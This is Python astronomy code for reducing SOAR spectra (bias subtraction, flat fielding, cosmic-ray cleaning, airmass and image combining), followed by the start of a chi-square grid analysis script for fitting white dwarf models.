np.savetxt(handle,diagnostic,fmt='%f',header=header)
def gauss(x,p): #single gaussian
return p[0] + p[1]*np.exp(-(((x-p[2])/(np.sqrt(2)*p[3])))**2.)
def fitgauss(p,fjac=None,x=None,y=None,err=None):
#Parameter values are passed in p
#fjac = None just means partial derivatives will not be computed
model = gauss(x,p)
status = 0
return([status,(y-model)/err])
def gaussslope(x,p): #single gaussian
return p[0] + p[1]*x + p[2]*np.exp(-(((x-p[3])/(np.sqrt(2)*p[4])))**2.)
def fitgaussslope(p,fjac=None,x=None,y=None,err=None):
#Parameter values are passed in p
#fjac = None just means partial derivatives will not be computed
model = gaussslope(x,p)
status = 0
return([status,(y-model)/err])
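# Minimal usage sketch for the fit helpers above, assuming the mpfit package is
# available and that x, y, err are 1-D numpy arrays (the parameter names below
# are illustrative, not part of this module):
#   p0 = [baseline, amplitude, center, sigma]            # initial guesses
#   result = mpfit.mpfit(fitgauss, p0, functkw={'x': x, 'y': y, 'err': err})
#   best_fit = gauss(x, result.params)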
def adcstat(specname):
hdu = fits.getheader(specname)
adc_stat = hdu['ADCSTAT']
print ('ADC status during observations was ', adc_stat)
return adc_stat
# ============================================================================
def Read_List( lst ):
# This function reads a list of images and decomposes them into a python
# list of image names.
list_file = open(lst,'r')
im_list = list_file.read()
list_file.close()
im_list = im_list.split()
return im_list
def List_Combe(img_list):
# This is meant to comb through list names to identify separate sublists of
# stars / flats / standards
sub_lists= [] # list of sub_list of images
sl= [] # sub_list of images
sl.append(img_list[0]) # place first image in sublist
i= 0; # image counter
#img_list[0][0] is a string, so we need to check it against strings. Use a shorter cutpoint if these are RAW images. This helps eliminate problems with short filenames.
if (img_list[0][0] == '0') or (img_list[0][0] == '1') or (img_list[0][0] == '2'):
cutpoint = 5
else:
cutpoint = 10
while i < len(img_list)-1: # run through all images
if img_list[i+1].__contains__(img_list[i][cutpoint:]) == True: #Old = 4
sl.append(img_list[i+1]) # place it in the sub_list
else:
# if the images don't match:
sub_lists.append(sl) # write the sublist to the list of sublist
sl= [] # clear the sublist
sl.append(img_list[i+1]) # append the image to the new list
i= i+1 # image counter
sub_lists.append(sl) # append the last sublist to the list of sublist
return sub_lists # return the list of sub_list of images
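# Sketch of the grouping behaviour (hypothetical file names, assuming the default
# cutpoint of 10 characters for processed images):
#   List_Combe(['b.fcrGD71_blue.fits', 'b2.fcrGD71_blue.fits', 'b.fcrFlat_red.fits'])
# returns [['b.fcrGD71_blue.fits', 'b2.fcrGD71_blue.fits'], ['b.fcrFlat_red.fits']]
# because consecutive names sharing the same tail after the cutpoint are grouped.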
def check_file_exist(name):
# This function is to be called before writing a file.
# This function checks if the file name already exists.
# If it does, it prepends a number to the beginning until
# the name no longer matches the files in the directory.
# List of files in directory
listDirFiles = [f for f in os.listdir('.') if f.endswith('.fits')]
# If "name" is in the directory, prepend a number i until it doesn't match
# If name is not in the directory then we simply return name
if listDirFiles.__contains__(name):
i= 2
while listDirFiles.__contains__(name):
name= str(i) + name
i= i+1
return name
def Fix_Header( header ):
# This function deletes the header cards that contain the badly coded
# degree symbol '\xb0'. If they are not deleted pyfits won't write the
# headers.
bad_key = ['param0', 'param61', 'param62', 'param63']
for p in bad_key:
if p in header:
bad_str = header.comments[p]
if '\xb0' in bad_str:
del header[p]
def decimal_dec(hdu_str):
# Reads header strings in "dd:mm:ss" (or "hh:mm:ss") format
# and returns the value as a decimal in the same units.
val_list = [float(n) for n in hdu_str.split(':')]
#if val_list[0] < 0 :
if str(val_list[0])[0] == '-':
sng = -1
val_list[0] = sng*val_list[0]
else:
sng = 1
val_deci = sng*(val_list[0]+((val_list[1]+(val_list[2]/60.0))/60.0))
return val_deci
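# Worked example (value taken from the SOAR latitude used below):
#   decimal_dec('-30:14:16.8') -> -(30 + 14/60 + 16.8/3600) = -30.238 deg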
def decimal_ra(hdu_str):
# Reads header strings in "hh:mm:ss" format
# and returns the value as decimal degrees (hours multiplied by 15).
val_list = [float(n) for n in hdu_str.split(':')]
if val_list[0] < 0 :
sng = -1.
val_list[0] = sng*val_list[0]
else:
sng = 1.
val_deci = 15.*sng*(val_list[0]+((val_list[1]+(val_list[2]/60.0))/60.0))
return val_deci
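# Worked example (hours are converted to degrees by the factor of 15):
#   decimal_ra('10:30:00') -> 15 * 10.5 = 157.5 deg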
def SigClip(data_set, lo_sig, hi_sig):
# Sigma Clipping Function #
# Input is the set of counts for a particular pixel,
# along with low and high sigma factors.
# Output is a list containing only the data that lie within the sigma limits.
# Only a single rejection iteration is made.
Avg = np.median(data_set)
#remove_max = np.delete(data_set,data_set.argmax())
#St_Dev = np.std(remove_max)
St_Dev = np.std(data_set)
min_val = Avg-lo_sig*St_Dev
max_val = Avg+hi_sig*St_Dev
cliped_data = []
#masked_data = []
for val in data_set:
if min_val <= val <= max_val:
cliped_data.append( val )
#else:
# masked_data.append( val)
return cliped_data#, masked_data
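# Illustrative example (hypothetical pixel stack): for
#   data_set = [10]*9 + [100], lo_sig = 10, hi_sig = 3
# the median is 10 and the (outlier-inflated) std is 27, so the clip window is
# [-260, 91]; the value 100 is rejected and the nine 10s are kept.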
def RaDec2AltAz(ra, dec, lat, lst ):
# Input: RA in decimal degrees; DEC in decimal deg;
#        LAT in decimal deg; LST in decimal degrees;
# Output: ALT, AZ, HA in decimal deg.
# Compute Hour Angle
ha = lst-ra # hour angle in deg
if ha < 0 :
ha = ha+360.
if ha > 360:
ha = ha-360.
# Convert Quantities to Radians
ra = ra*(np.pi/180.0)
dec = dec*(np.pi/180.0)
lat = lat*(np.pi/180.0)
ha = ha*(np.pi/180.0)
# Calculate Altitude
a = np.sin(dec)*np.sin(lat)
b = np.cos(dec)*np.cos(lat)*np.cos(ha)
alt = np.arcsin( a+b ) # altitude in radians
# Calculate Azimuth
a = np.sin(dec)-np.sin(lat)*np.sin(alt)
b = np.cos(lat)*np.cos(alt)
az = np.arccos( a/b ) # azimuth in radians
if np.sin(ha) > 0:
az = (2.*np.pi) - az
# Convert Alt, Az, and Ha to decimal deg
alt = alt*(180.0/np.pi)
az = az*(180.0/np.pi)
ha = ha*(180.0/np.pi)
return alt, az, ha
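# Sanity-check example (SOAR latitude, star on the meridian): for ra = lst
# (hour angle 0), dec = 0 deg and lat = -30.238 deg the altitude is
# 90 - |lat - dec| = 59.76 deg and the azimuth is 0 deg, since a star north of
# the zenith transits due north for this southern site.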
def AirMass(alt, scale):
# Calculates instantaneous airmass to be called by SetAirMass() #
# This comes from Allen, Astrophysical Quantities, page 125.
# See also http://stsdas.stsci.edu/cgi-bin/gethelp.cgi?setairmass
# Input:
#       scale = atmospheric scale factor (default 750)
# alt = altitude of star in degrees.
# Output:
# AM = airmass from given altitude and scale factor
x = scale*np.sin(np.pi*alt/180.)
AM = np.sqrt( x**2. + 2.*scale + 1. ) - x
return AM
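# Quick checks of the formula: at the zenith (alt = 90) x = scale and
# AM = sqrt((scale+1)**2) - scale = 1 exactly; at alt = 30 with scale = 750
# the result is ~2.0, matching the familiar sec(z) value at a 60 deg zenith angle.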
def EffectiveAirMass(AM_st, AM_mid, AM_end):
# Calculate effective airmass to be called by SetAirMass() and Imcombine()
# This comes from Stetson, 'Some Factors Affecting the Accuracy of Stellar
# Photometry with CCDs,' DAO preprint, September 1988 and uses Simpson's rule.
# See also http://stsdas.stsci.edu/cgi-bin/gethelp.cgi?setairmass
# Input: airmass at start, middle, and end of an exposure.
# Output: Effective Airmass
AM_eff = (AM_st + 4.*AM_mid + AM_end)/6.
return AM_eff
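# Worked example (hypothetical airmasses): AM_st = 1.10, AM_mid = 1.15,
# AM_end = 1.21 gives AM_eff = (1.10 + 4*1.15 + 1.21)/6 = 1.1517.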
def Add_Scale (img_block):
# Function to be called by Imcombine.
# The function is meant to additively scale a set of images (zeros in particular).
# The input is a numpy block of pixel values (see imcombine).
# The function calculates the mean counts over the full frame of the first image.
# It then scales the rest of the images by adding the difference between the
# average counts of the first image and their own.
# Returns a scaled image block, and a list of scale values.
print("Scaling Counts Additively.\n")
ni, ny, nx = np.shape(img_block)
Cavg= [] # Average Counts
Sval= [] # Scale Values
for i in range(0,ni):
Cavg.append( np.mean(img_block[i,:,:]) )
Sval.append( Cavg[0]-Cavg[i] )
img_block[i]= img_block[i] + Sval[i]
try:
diagnostic[0:len(Cavg),0] = np.array(Cavg)
except:
pass
return img_block, Sval
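# Illustrative example (hypothetical frame means): for three zeros whose full-frame
# means are 100, 90 and 110 counts, the scale values are [0, +10, -10] and every
# frame ends up with a mean of 100 counts, matching the first image.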
def Mult_Scale (img_block,index):
# Function to be called by Imcombine.
# The function is meant to multiplicatively scale a set of images (flats in particular).
# The input is a numpy block of pixel values (see imcombine).
# The function calculates the mean counts over the full frame of the first image.
# It then scales the rest of the images by multiplying by the ratio between the
# average counts of the first image and their own.
# Returns a scaled image block, and a list of scale values.
print("Scaling Counts Multiplicatively.\n")
ni, ny, nx = np.shape(img_block)
Cavg= [] # Average Counts
Cstd = [] #Standard deviation
Sval= [] # Scale Values
for i in range(0,ni):
Cavg.append( np.mean(img_block[i,:,:]) )
Cstd.append( np.std(img_block[i,:,:]))
Sval.append( Cavg[0]/Cavg[i] )
img_block[i]= img_block[i]*Sval[i]
try:
if index == 1:
diagnostic[0:len(Cavg),3] = np.array(Cavg)
diagnostic[0:len(Cstd),4] = np.array(Cstd)
except:
pass
return img_block, Sval
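# Illustrative example (hypothetical frame means): for two flats whose full-frame
# means are 20000 and 10000 counts, the scale values are [1.0, 2.0] and both
# frames end up with a mean of 20000 counts before normalization.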
# ===========================================================================
# Main Functions ============================================================
# ===========================================================================
def lacosmic(img):
#This function runs LA Cosmic on the images
#LA Cosmic is explained in PASP 113, 1420 (2001)
#This implementation comes, originally, from http://www.astro.yale.edu/dokkum/lacosmic/
print('')
print('Finding cosmic rays in ', img)
datalist = fits.open(img)
data = datalist[0].data
data2 = data[0,:,:]
array = data2
header = fits.getheader(img)
Fix_Header(header)
#gain = 1.33 #datalist[0].header['GAIN'] #1.33 from 2017-06-07
gain = datalist[0].header['GAIN']
rdnoise = datalist[0].header['RDNOISE']
c = cosmics.cosmicsimage(array, gain=gain, readnoise=rdnoise, sigclip = 5.0, sigfrac = 0.5, objlim = 4.0,satlevel=45000.0,verbose=True)
c.run(maxiter=4)
maskname = img[0:img.find('.fits')] + '_mask.fits'
mask_array = np.expand_dims(c.mask,axis=0)
mask_array = np.cast['uint8'](mask_array)
mask_im = fits.PrimaryHDU(data=mask_array,header=header)
mask_im.writeto(maskname,clobber=True)
print('Mask image: ', maskname)
cleanname = 'c' + img
data_array = np.expand_dims(c.cleanarray,axis=0)
header.set('MASK',maskname,'Mask of cosmic rays')
clean_im = fits.PrimaryHDU(data=data_array,header=header)
clean_im.writeto(cleanname,clobber=True)
print('Clean image: ', cleanname)
return cleanname, maskname
def Bias_Subtract( img_list, zero_img ):
# This function takes in a list of images and a bias image 'zero_img'
# and performs a pixel by pixel subtraction using numpy.
# The function writes the bias subtracted images as 'b.Img_Name.fits'.
# The output is a list of names for the bias subtracted images.
print("\n====================\n")
print('Bias Subtracting Images: \n')
zero_data = fits.getdata(zero_img)
bias_sub_list = []
for img in img_list:
print(img)
hdu = fits.getheader(img)
Fix_Header(hdu)
img_data = fits.getdata(img)
img_data[ np.isnan(img_data) ] = 0
b_img_data = np.subtract(img_data, zero_data)
print('b.'+"%s Mean: %.3f StDev: %.3f" % (img, np.mean(b_img_data), np.std(b_img_data)))
hdu.set( 'DATEBIAS', datetime.datetime.now().strftime("%Y-%m-%d"), 'Date of Bias Subtraction' )
hdu.append( ('BIASSUB', zero_img ,'Image Used to Bias Subtract.'),
useblanks= True, bottom= True )
NewHdu = fits.PrimaryHDU(b_img_data, hdu)
#bias_sub_name= check_file_exist('b.'+img)
bias_sub_name= 'b.'+img
NewHdu.writeto(bias_sub_name, output_verify='warn', clobber= True)
bias_sub_list.append( bias_sub_name )
return bias_sub_list
# ===========================================================================
def Norm_Flat_Avg( flat ):
# Takes the average value of all the pixels and divides the entire flat by
# that value using numpy.
print("\n====================\n")
print('Normalizing %s By Dividing Each Pixel By Average Value:' % ( flat ))
# Read Data, take average, and divide #
flat_data = fits.getdata(flat)
flat_data[ np.isnan(flat_data) ] = 0
# Calculate the average over the full flat frame #
avg_flat = np.average( flat_data[:,:,:] )
norm_flat_data = np.divide( flat_data, float(avg_flat) )
print('Average Value: %s\n' % avg_flat)
# Copy Header, write changes, and write file #
hdu = fits.getheader(flat)
Fix_Header(hdu)
hdu.append( ('NORMFLAT', avg_flat,'Average Used to Normalize the Flat.'),
useblanks= True, bottom= True )
NewHdu = fits.PrimaryHDU(data= norm_flat_data, header= hdu)
#norm_flat_name= check_file_exist('n'+flat)
norm_flat_name= 'n'+flat
NewHdu.writeto(norm_flat_name, output_verify='warn', clobber= True )
print ('Flat: %s Mean: %.3f StDev: %.3f' % (norm_flat_name, np.mean(norm_flat_data), np.std(norm_flat_data)))
return (norm_flat_name)
# ============================================================================
# ===========================================================================
def Flat_Field( spec_list, flat ):
# This Function divides each spectrum in spec_list by the flat and writes
# The new images as fits files. The output is a list of file names of
# the flat fielded images.
print("\n====================\n")
print('Flat Fielding Images by Dividing by %s\n' % (flat))
np.seterr(divide= 'warn')
flat_data = fits.getdata(flat)
'''
#If flat is a blue spectrum, find the Littrow ghost and add those pixels to the header
if 'blue' in flat.lower():
#See if littrow_ghost.txt already exists
file_exist = glob('littrow_ghost.txt')
if len(file_exist) == 1:
littrow_location = np.genfromtxt('littrow_ghost.txt')
littrow_ghost = [littrow_location[0],littrow_location[1]]
fit_data = np.median(flat_data[75:85],axis=0)
low_index = 1210. #Lowest pixel to search within
high_index = 1710. #highest pixel to search within
fit_data1 = fit_data[low_index:high_index]
fit_pix1 = np.linspace(low_index,low_index+len(fit_data1),num=len(fit_data1))
diagnostic[0:len(fit_pix1),17] = fit_pix1
diagnostic[0:len(fit_data1),18] = fit_data1
diagnostic[0,21] = littrow_ghost[0]
diagnostic[1,21] = littrow_ghost[1]
else:
littrow_ghost = find_littrow(flat)
litt_low = int(littrow_ghost[0])
litt_hi = int(littrow_ghost[1])
try:
hduflat = fits.getheader(flat)
stitchloc = hduflat['STITCHLO']
#print stitchloc
except:
stitchloc = 'None'
pass
else:
littrow_ghost = 'None'
stitchloc = 'None'
'''
f_spec_list = []
if isinstance(spec_list,str):
spec_list = [spec_list] #Ensure that spec_list is actually a list
for spec in spec_list:
spec_data = fits.getdata(spec)
f_spec_data = np.divide(spec_data, flat_data)
f_spec_data[ np.isnan(f_spec_data) ] = 0
print("f"+"%s Mean: %.3f StDev: %.3f" % (spec, np.mean(f_spec_data), np.std(f_spec_data) ))
hdu = fits.getheader(spec)
Fix_Header(hdu)
hdu.set('DATEFLAT', datetime.datetime.now().strftime("%Y-%m-%d"), 'Date of Flat Fielding')
hdu.append( ('FLATFLD', flat,'Image used to Flat Field.'),
useblanks= True, bottom= True )
NewHdu = fits.PrimaryHDU(data= f_spec_data, header= hdu)
#new_file_name= check_file_exist('f'+spec)
new_file_name= 'f'+spec
NewHdu.writeto(new_file_name, output_verify='warn', clobber= True)
f_spec_list.append(new_file_name)
return f_spec_list
# ===========================================================================
def SetAirMass(img, lat= -30.238, scale= 750):
# This Function Calculates The Effective Airmass of a single image
# Inputs:
# img = image name
# lat = latitude of observer in decimal degrees.
# (Default Soar lat: '-30:14:16.8' = -30.238 deg)
# scale = atmospheric scale factor 750
# Output:
# AMeff = effective airmass for single image
# Image Info #
hdulist = fits.open(img, 'update')
hdu = hdulist[0]
Fix_Header(hdu.header)
ra = decimal_ra( hdu.header['RA'] ) # RA in decimal degrees
dec = decimal_dec( hdu.header['DEC'] ) # deg
lst_st = decimal_ra( hdu.header['LST'] ) # start-of-exposure LST in decimal degrees
exp = hdu.header['EXPTIME'] # sec
lst_mid = lst_st + 15.*(exp/2.)/3600. # mid-exposure LST in degrees (LST advances 15 deg/hr)
lst_end = lst_st + 15.*exp/3600. # end-of-exposure LST in degrees
# Air Mass Calculations #
times = [lst_st, lst_mid, lst_end]
AM = []
for t in times:
alt, az, ha = RaDec2AltAz(ra, dec, lat, t )
airmass = AirMass(alt, scale)
AM.append( airmass )
AMeff = EffectiveAirMass(AM[0], AM[1], AM[2])
# Print and write to header #
print('\nImage:', img)
print('Observatory Latitude: %s' % lat)
print('AM_st AM_mid AM_end AM_eff')
print('%5.4f %5.4f %5.4f %5.4f' % (AM[0], AM[1], AM[2], AMeff))
hdu.header.set( 'AIRMASS', np.round(AMeff,6) ,
'Calculated Effective Airmass' )
hdulist.close()
return AMeff
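# Usage sketch (hypothetical file name):
#   AMeff = SetAirMass('b.spec_0001.fits')
# The image must carry RA, DEC, LST and EXPTIME header cards; the computed value
# is also written back to the AIRMASS card.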
# ===========================================================================
def imcombine(im_list, output_name, method,
lo_sig = 10, hi_sig = 3, overwrite= False, mask=False):
# Image Combination Script #
# Inputs:
#        im_list = must be a python list of images or "@listfile"
# output_name = name of combined fits image
# method = The method to use for combining (median, average, sum)
#        lo_sig = low sigma clipping factor (default = 10)
#        hi_sig = high sigma clipping factor (default = 3)
# overwrite = if true go ahead and re write existing file 'output_name'
# if false it will warn you and ask for new output_name.
# (default false)
# Output:
#     After successfully combining, calculating airmass, and writing to the fits file,
# The return of this function is the name of the combined
# image (Output_name).
print("\n====================\n")
print("Combining Images:")
print("Using %s of count values." % method)
print("Sigma Clipping Factors (low, high): (%s, %s)\n" % (lo_sig, hi_sig))
# Read image data and put it in a numpy block #
Ni = len(im_list)
for i in range(0, Ni):
# First size the array to contain the data based on 1st image #
# Create block with 3 axis:
# axis[0] has length of number of images.
# axis[1] is the vertical axis of the chip.
# axis[2] is the horizontal axis of the chip.
if i == 0:
img_data = fits.getdata(im_list[i])
#n,Ny,Nx = np.shape(img_data)
Ny = img_data.shape[-2]
Nx = img_data.shape[-1]
img_block = np.ndarray( shape= (Ni,Ny,Nx) )
img_block[i,:,:] = img_data
if mask:
mask_data = fits.getdata(mask[i])
mask_block = np.ndarray(shape= (Ni,Ny,Nx) )
mask_block[i,:,:] = mask_data
# Then go ahead and read the rest of the images into the block #
else:
img_block[i,:,:] = fits.getdata(im_list[i])
if mask:
mask_block[i,:,:] = fits.getdata(mask[i])
# set nan values to zero #
img_block[ np.isnan(img_block) ] = 0
# If Zero Additive Scale Images #
if im_list[0].lower().__contains__("zero"):
img_block, Scale = Add_Scale(img_block)
# If Flats Multiplicative Scale Images #
elif im_list[0].lower().__contains__("flat"):
index = 1.
img_block, Scale= Mult_Scale(img_block,index)
'''
if im_list[0].lower().__contains__("blue"):
index = 1.
img_block, Scale= Mult_Scale(img_block,index)
elif im_list[0].lower().__contains__("red"):
index = 2.
img_block, Scale= Mult_Scale(img_block,index)
'''
# If Not, Dont Scale #
else:
print("Did Not Scale Images.\n")
Scale= np.empty(Ni)
Scale[:]= np.NaN
# Print Name and Statistics of Each image %
avgarr,stdarr = np.zeros(Ni), np.zeros(Ni)
for i in range(0,Ni):
#Avg= np.mean(img_block[i,25:75,1700:1800])
#Std= np.std(img_block[i,25:75,1700:1800])
Avg = np.mean(img_block[i,:,:])
Std = np.std(img_block[i,:,:])
avgarr[i] = Avg
stdarr[i] = Std
print( "%02d: %s ScaleValue:% .3f Mean: %.3f StDev: %.3f"
% (i, im_list[i], Scale[i], Avg, Std) )
#Save Values to diagnostic array
try:
if im_list[0].lower().__contains__("zero"):
diagnostic[0:len(avgarr),1] = avgarr
diagnostic[0:len(stdarr),2] = stdarr
if im_list[0].lower().__contains__("flat"):
diagnostic[0:len(avgarr),5] = avgarr
diagnostic[0:len(stdarr),6] = stdarr
except:
pass
## Combine the images according to input "method" using SigClip() above ##
comb_img = np.ndarray( shape= (1,Ny,Nx), dtype='float32')
##mask_img = np.ndarray( shape= (1,Ny,Nx), dtype='float32')
while True: # Continually asks for method if input is weird #
if method == 'median':
for y in range(0,Ny):
for x in range(0,Nx):
counts = img_block[:,y,x]
val = np.median( SigClip(counts, lo_sig, hi_sig) )
comb_img[0,y,x] = np.float32(val)
break # exit while loop
elif method == 'average':
for y in range(0,Ny):
for x in range(0,Nx):
if mask:
counts = img_block[:,y,x]
masks = mask_block[:,y,x].astype(bool)
mx = np.ma.masked_array(counts,masks)
val = mx.mean() #We don't want to sigma clip if already masking
#if True in masks:
# print counts
# print masks
# print val
# print ''
else:
counts = img_block[:,y,x]
#counts_good, counts_bad = SigClip(counts, lo_sig, hi_sig)
val = np.average( SigClip(counts, lo_sig, hi_sig) )
#val = np.average(counts_good)
comb_img[0,y,x] = np.float32(val)
#mask = np.average(counts_bad)
#mask_img[0,y,x] = np.float32(mask)
#mask_image = fits.PrimaryHDU(data=mask_img)
#mask_image.writeto('Mask.fits')
break # exit while loop
elif method == 'sum':
for y in range(0,Ny):
for x in range(0,Nx):
counts = img_block[:,y,x]
val = np.sum( SigClip(counts, lo_sig, hi_sig) )
comb_img[0,y,x] = np.float32(val)
#print img_block[:,100,50]
#print comb_img[:,100,50]
break # exit while loop
else:
# if 'method' input is wanky, ask for method again.
print("\nError: Method NOT AVAILABLE.")
print("Available Methods: ('median', 'average', 'sum')")
print("Enter Valid Method")
method = input('>>>')
# Set NAN values to zero
comb_img[ np.isnan(comb_img) ] = np.float32(0)
###### Calculate Effective Airmass for combined image ######
# The EffAM value is written into the header in the next section #
print('\nCalculating Effective Airmass:')
# if we're just combining 2 images #
if Ni == 2:
AM0 = SetAirMass(im_list[0])
AM2 = SetAirMass(im_list[1])
AM1 = (AM0+AM2)/2
EffAM = EffectiveAirMass(AM0, AM1, AM2)
print('\nEffective Airmass of combined image: %5.4f' % EffAM)
# if we're combining an odd number of images #
elif Ni%2 == 1:
images = [ im_list[0], im_list[Ni//2], im_list[-1] ]
AM = [ SetAirMass(img) for img in images ]
EffAM = EffectiveAirMass( AM[0], AM[1], AM[2] )
print('\nEffective Airmass of combined image: %5.4f' % EffAM)
# if we're combining an even number of images #
elif Ni%2 == 0:
images = [im_list[0], im_list[(Ni//2)-1], im_list[Ni//2], im_list[-1]]
AM = [ SetAirMass(img) for img in images ]
EffAM = EffectiveAirMass( AM[0], (AM[1]+AM[2])/2, AM[3])
print('\nEffective Airmass of combined image: %5.4f' % (EffAM))
# Otherwise we fail #
else:
print("Eff AirMass calculation failed? This never happens!")
###### Overwrite Protection loop, just in case ######
if overwrite == False:
from os.path import isfile
while overwrite == False: # Outer Loop #
# Breaks if the file name does not exist or overwrite == True #
exist = isfile(output_name) # Asks the computer if the file name exists #
if exist == False:
print("\nWriting combined image to fits file",output_name,"...")
break # Break out of outter loop and continue writing #
elif exist == True:
while True: # Inner Loop #
# Breaks if user wishes to overwite, abort, or gives new name.
# loop also checks new names for existance.
print("\nFile name",output_name,)
print("already exists. Do you wish to overwrite?")
yes_no = input('yes or no ?>>>')
if yes_no == 'no':
# If overwrite no: prompt new name or abort #
print("\nEnter new file name or Ctrl-c to Abort ")
output_name = input('>>>')
print("\nNew File Name:= ", output_name)
break # breaks out of Inner loop only.
# Code proceeds to Outer Loop to
# ask computer if new file name exist.
elif yes_no == 'yes':
# If overwrite yes: Break Inner Loop and Outer loop #
overwrite = True
print("\nOverwriting Image:", output_name)
break
else:
# If yes_no input is weird return to Inner loop
# to ask question again.
print("\nInput Not Recognized.")
###### The following part only runs if above while loop is satisfied ######
# Copy header of first image in im_list and fix degree symbol issue.
hdulist = fits.open(im_list[0])
hdu = hdulist[0]
# This checks the string and deletes the bad keywords from header.
Fix_Header(hdu.header)
# Write Effective Airmass into header #
hdu.header.set('AIRMASS',np.round(EffAM,6),'Calculated Effective Airmass')
#Write date of image combination to header #
hdu.header.set('DATECOMB', datetime.datetime.now().strftime("%Y-%m-%d"), 'Date of Image combination')
# Write the imcombine information into header #
N = len(im_list)
for i in range(0,N):
num = str(i+1).zfill(3)
key = 'IMCMB'+num
hdu.header.append( (key, im_list[i]), useblanks= True, bottom= True )
hdu.header.append( ('NCOMBINE', N), useblanks= True, bottom = True )
hdu.header.append( ('COMBTYPE', method,'Operation Used to Combine'),
useblanks= True, bottom= True )
# Make sure header BITPIX reflects data encoding as float 32 ie: -32
hdu.header['BITPIX'] = -32
# Write header to new fits file
#new_file_name= check_file_exist(output_name)
new_file_name= output_name
hdu.writeto(new_file_name, output_verify='warn', clobber= True)
# write combined data to new fits file #
fits.update(output_name, data= comb_img, header= hdu.header,
output_verify='warn')
print( "\nCombined Image: %s Mean: %.3f StDev: %.3f"
% (new_file_name, np.mean(comb_img), np.std(comb_img)) )
return new_file_name
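# Hedged usage sketch (hypothetical file names):
#   combined = imcombine(['Zero.0001.fits', 'Zero.0002.fits', 'Zero.0003.fits'],
#                        'Zero.fits', 'average')
# Because the first name contains "zero", the frames are additively scaled
# before being averaged with sigma clipping.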
# ===========================================================================
# ===========================================================================
# ===========================================================================
``` |
{
"source": "joshfuchs/ZZCeti_analysis",
"score": 3
} |
#### File: joshfuchs/ZZCeti_analysis/computechi.py
```python
import numpy as np
import os
import mpfit
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from scipy.interpolate import RectBivariateSpline
import analysis_tools as at
def parabola(x,p):
return p[0] + p[1]*x + p[2]*x**2.
def fitparabola(p,fjac=None,x=None,y=None,err=None):
model = parabola(x,p)
status = 0
return([status,(y-model)/err])
def polynomial2(x,y,p):
return p[0] + p[1]*x + p[2]*x**2. + p[3]*x*y + p[4]*y**2. + p[5]*y
def fitpolynomial2(p,fjac=None,x=None,y=None,z=None,err=None):
model = polynomial2(x,y,p)
status = 0
return([status,(z-model)/err])
def polynomial3(x,y,p):
return p[0] + p[1]*x + p[2]*x**2. + p[3]*x**3. + p[4]*x**2.*y + p[5]*x*y + p[6]*x*y**2. + p[7]*y**3. + p[8]*y**2. + p[9]*y
def fitpolynomial3(p,fjac=None,x=None,y=None,z=None,err=None):
model = polynomial3(x,y,p)
status = 0
return([status,(z-model)/err])
def paraboloid(x,y,p):
return p[0]*(((x-p[1])/p[2])**2. + ((y-p[3])/p[4])**2.) + p[5]
def fitparaboloid(p,fjac=None,x=None,y=None,z=None,err=None):
model = paraboloid(x,y,p)
status = 0
return([status,(z-model)/err])
#os.chdir('/afs/cas.unc.edu/depts/physics_astronomy/clemens/students/group/modelfitting/Koester_06/RESULTS')
wdname = 'wcftb.WD1422p095_930_blue_flux_master'
datedone = '06-20_4.28.txt'
cutteff = False
teff_limit = 14000.
#Set up filenames to read
allfile = 'chi_' + wdname + '_' + datedone
print 'File: ', allfile
alphafile = 'chi_' + wdname + '_alpha_' + datedone
betafile = 'chi_' + wdname + '_beta_' + datedone
gammafile = 'chi_' + wdname + '_gamma_' + datedone
deltafile = 'chi_' + wdname + '_delta_' + datedone
epsilonfile = 'chi_' + wdname + '_epsilon_' + datedone
H8file = 'chi_' + wdname + '_H8_' + datedone
H9file = 'chi_' + wdname + '_H9_' + datedone
H10file = 'chi_' + wdname + '_H10_' + datedone
#Read in first grid to determine range of spacing of variables
with open(allfile,'r') as f:
first_line = f.readline()
try:
bottomg,stepg,topg,bottomt,stept,topt,numpoints = [float(x) for x in first_line[2:].split(",")]
except:
bottomg,stepg,topg,bottomt,stept,topt = [float(x) for x in first_line[2:].split(",")]
teff = np.linspace(bottomt,topt,(topt-bottomt)/stept+1.,endpoint=True)
logg = np.linspace(bottomg,topg,(topg-bottomg)/stepg+1.,endpoint=True)
teffgrid, logggrid = np.meshgrid(teff,logg)
'''
#Set up grid. This is saved in the header of the chi*txt file
bottomt = 10000.
topt = 15000.
stept = 10.
teff = np.linspace(bottomt,topt,(topt-bottomt)/stept+1.,endpoint=True)
bottomg = 7.0
topg = 9.5
stepg = 0.05
logg = np.linspace(bottomg,topg,(topg-bottomg)/stepg+1.,endpoint=True)
teffgrid, logggrid = np.meshgrid(teff,logg)
'''
#Read in saved grids
allchi = np.genfromtxt(allfile,dtype='d')
try:
alphachi = np.genfromtxt(alphafile,dtype='d')
except:
print 'No H-alpha file \n'
pass
betachi = np.genfromtxt(betafile,dtype='d')
gammachi = np.genfromtxt(gammafile,dtype='d')
deltachi = np.genfromtxt(deltafile,dtype='d')
epsilonchi = np.genfromtxt(epsilonfile,dtype='d')
H8chi = np.genfromtxt(H8file,dtype='d')
H9chi = np.genfromtxt(H9file,dtype='d')
H10chi = np.genfromtxt(H10file,dtype='d')
'''
#Convert to reduced chi-square
allchi /= numpoints
try:
alphachi /= numpoints
except:
pass
betachi /= numpoints
gammachi /= numpoints
deltachi /= numpoints
epsilonchi /= numpoints
H8chi /= numpoints
H9chi /= numpoints
H10chi /= numpoints
'''
#combine different lines
print 'Shape: ', allchi.shape
combined = betachi + gammachi + deltachi + epsilonchi + H8chi + H9chi + H10chi#alphachi + betachi + gammachi + deltachi + epsilonchi + H8chi + H9chi + H10chi
try:
a10chi = alphachi + betachi + gammachi + deltachi + epsilonchi + H8chi + H9chi + H10chi
except:
pass
b10chi = betachi + gammachi + deltachi + epsilonchi + H8chi + H9chi + H10chi
g10chi = gammachi + deltachi + epsilonchi + H8chi + H9chi + H10chi
g9chi = gammachi + deltachi + epsilonchi + H8chi + H9chi
g8chi = gammachi + deltachi + epsilonchi + H8chi
b9chi = betachi + gammachi + deltachi + epsilonchi + H8chi + H9chi
b8chi = betachi + gammachi + deltachi + epsilonchi + H8chi
#specify a portion of the grid to extract
#lowg, highg = 7.75, 8.25
#lowgindex, highgindex = np.where(logg == lowg), np.where(logg == highg)
#loggsmall = logg[lowgindex[0]:highgindex[0]+1]
#lowt, hight = 12250., 12750.
#lowtindex, hightindex = np.where(teff == lowt), np.where(teff == hight)
#teffsmall = teff[lowtindex[0]:hightindex[0]+1]
#plot wireframe and scatter plot of chi-square values
fig = plt.figure(1)
ax = fig.gca(projection='3d')
sur = ax.plot_wireframe(teffgrid,logggrid,combined,rstride=1,cstride=1)
